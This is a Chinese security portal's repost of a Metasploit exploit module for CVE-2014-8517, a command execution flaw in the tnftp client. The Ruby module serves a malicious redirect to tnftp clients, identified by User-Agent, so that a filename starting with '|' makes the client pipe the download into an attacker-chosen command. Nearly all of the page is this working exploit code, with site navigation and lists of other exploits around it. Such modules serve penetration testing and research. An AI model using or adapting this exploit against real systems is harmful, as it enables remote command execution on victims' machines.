首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
tnftp - 'savefile' Arbitrary Command Execution (Metasploit)
来源:metasploit.com 作者:wvu 发布时间:2017-11-06  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpServer
  include Msf::Auxiliary::Report
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'tnftp "savefile" Arbitrary Command Execution',
      'Description' => %q{
        This module exploits an arbitrary command execution vulnerability in
        tnftp's handling of the resolved output filename - called "savefile" in
        the source - from a requested resource.
 
        If tnftp is executed without the -o command-line option, it will resolve
        the output filename from the last component of the requested resource.
 
        If the output filename begins with a "|" character, tnftp will pass the
        fetched resource's output to the command directly following the "|"
        character through the use of the popen() function.
      },
      'Author' => [
        'Jared McNeill', # Vulnerability discovery
        'wvu' # Metasploit module
      ],
      'References' => [
        ['CVE', '2014-8517'],
        ['URL', 'http://seclists.org/oss-sec/2014/q4/459']
      ],
      'DisclosureDate' => 'Oct 28 2014',
      'License' => MSF_LICENSE,
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Privileged' => false,
      'Payload' => {'BadChars' => '/'},
      'Targets' => [['ftp(1)', {}]],
      'DefaultTarget' => 0
    ))
  end
 
  def on_request_uri(cli, request)
    unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/
      print_status("#{request['User-Agent']} connected")
      send_not_found(cli)
      return
    end
 
    if request.uri.ends_with?(sploit)
      send_response(cli, '')
      print_good("Executing `#{payload.encoded}'!")
      report_vuln(
        :host => cli.peerhost,
        :name => self.name,
        :refs => self.references,
        :info => request['User-Agent']
      )
    else
      print_status("#{request['User-Agent']} connected")
      print_status('Redirecting to exploit...')
      send_redirect(cli, sploit_uri)
    end
  end
 
  def sploit_uri
    (get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") +
      Rex::Text.uri_encode(sploit, 'hex-all')
  end
 
  def sploit
    "|#{payload.encoded}"
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GraphicsMagick - Memory Disclo
·WordPress WP Mobile Detector 3
·Oracle PeopleSoft Enterprise P
·Avaya IP Office (IPO) 10.1 Act
·Sera 1.2 Local Root / Password
·Avaya IP Office (IPO) 10.1 Sof
·Vir.IT eXplorer Anti-Virus - P
·Ipswitch WS_FTP Professional <
·WhatsApp 2.17.52 - Memory Corr
·Debut Embedded httpd 1.20 - De
·Easy MPEG/AVI/DIVX/WMV/RM to D
·SMPlayer 17.11.0 - '.m3u' Buff
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved